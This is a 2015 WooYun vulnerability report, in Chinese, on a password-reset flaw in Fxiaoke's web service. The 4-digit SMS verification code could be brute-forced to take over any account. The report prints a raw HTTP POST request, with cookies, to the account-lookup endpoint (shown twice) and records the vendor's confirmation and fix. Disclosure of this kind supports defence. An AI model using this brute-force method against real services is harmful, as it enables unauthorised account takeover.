北京易动纷享任意用户登陆
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0124297
漏洞标题:北京易动纷享任意用户登陆
相关厂商:北京易动纷享科技有限责任公司
漏洞作者:路人甲
提交时间:2015-07-03 11:43
公开时间:2015-08-17 16:42
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经修复
Tags标签:
漏洞详情
披露状态:
2015-07-03: 细节已通知厂商并且等待厂商处理中
2015-07-04: 厂商已经确认,细节仅向厂商公开
2015-07-14: 细节向核心白帽子及相关领域专家公开
2015-07-24: 细节向普通白帽子公开
2015-08-03: 细节向实习白帽子公开
2015-08-17: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
北京易动纷享科技有限责任公司任意用户登陆,新厂商,来一发
详细说明:
找回密码的地方发送手机验证码是4位纯数字可以爆破我们重置个13800138000的号码来试试
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /WebReg/GetAllEmployeeAccounts HTTP/1.1<br> Host: www.fxiaoke.com<br> Proxy-Connection: keep-alive<br> Content-Length: 37<br> Accept: application/json, text/javascript, */*; q=0.01<br> X-Requested-With: XMLHttpRequest<br> Origin: http://www.fxiaoke.com<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.1000 Chrome/30.0.1599.101 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> DNT: 1<br> Referer: http://www.fxiaoke.com/xiaoke/pc/findpwd.html<br> Accept-Encoding: gzip,deflate<br> Accept-Language: zh-CN<br> Cookie: IESESSION=alive; pgv_pvi=5707100160; pgv_si=s9672714240; guid=47af3b8b-9efd-6f21-04ca-114e51ecaa21; Hm_lvt_06d5233541e92feb3cc8980700b1efa6=1435893542; Hm_lpvt_06d5233541e92feb3cc8980700b1efa6=1435893965; FSAuthXA=1G0PjvXIJW40003AxIgtk045eo3m6WkvRRzPQJjSJxxC0wpHhocCqmVslsGdmbqpdV334Md64H5H1o7dIlVCygJESUOJhM0jwBJEyr5by20vJ6W5f6hzYpI4jdhfy4XDctbJYzRKBfjrBtssgyo8zJ3qYQWGb4Mjx649p6; FSAuthX=; RouteUp=0; mirrorId=0000; originRefer=www.fxiaoke.commobileOrEMail=13800138000&code=111111 |
可以看到爆破成功
验证码就是9076然后看到各种账号,可任意重置
就不进步一深入了
漏洞证明:
找回密码的地方发送手机验证码是4位纯数字可以爆破我们重置个13800138000的号码来试试
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
POST /WebReg/GetAllEmployeeAccounts HTTP/1.1<br> Host: www.fxiaoke.com<br> Proxy-Connection: keep-alive<br> Content-Length: 37<br> Accept: application/json, text/javascript, */*; q=0.01<br> X-Requested-With: XMLHttpRequest<br> Origin: http://www.fxiaoke.com<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.1000 Chrome/30.0.1599.101 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> DNT: 1<br> Referer: http://www.fxiaoke.com/xiaoke/pc/findpwd.html<br> Accept-Encoding: gzip,deflate<br> Accept-Language: zh-CN<br> Cookie: IESESSION=alive; pgv_pvi=5707100160; pgv_si=s9672714240; guid=47af3b8b-9efd-6f21-04ca-114e51ecaa21; Hm_lvt_06d5233541e92feb3cc8980700b1efa6=1435893542; Hm_lpvt_06d5233541e92feb3cc8980700b1efa6=1435893965; FSAuthXA=1G0PjvXIJW40003AxIgtk045eo3m6WkvRRzPQJjSJxxC0wpHhocCqmVslsGdmbqpdV334Md64H5H1o7dIlVCygJESUOJhM0jwBJEyr5by20vJ6W5f6hzYpI4jdhfy4XDctbJYzRKBfjrBtssgyo8zJ3qYQWGb4Mjx649p6; FSAuthX=; RouteUp=0; mirrorId=0000; originRefer=www.fxiaoke.commobileOrEMail=13800138000&code=111111 |
可以看到爆破成功
验证码就是9076然后看到各种账号,可任意重置
就不进步一深入了
修复方案:
至少换成6位纯数字吧
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-07-0400:15
厂商回复:
非常感谢提供漏洞信息,我们将尽快研究并修复。
最新状态:
2015-08-17:已修复,并上线,再次感谢。
评价
原文连接:北京易动纷享任意用户登陆
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
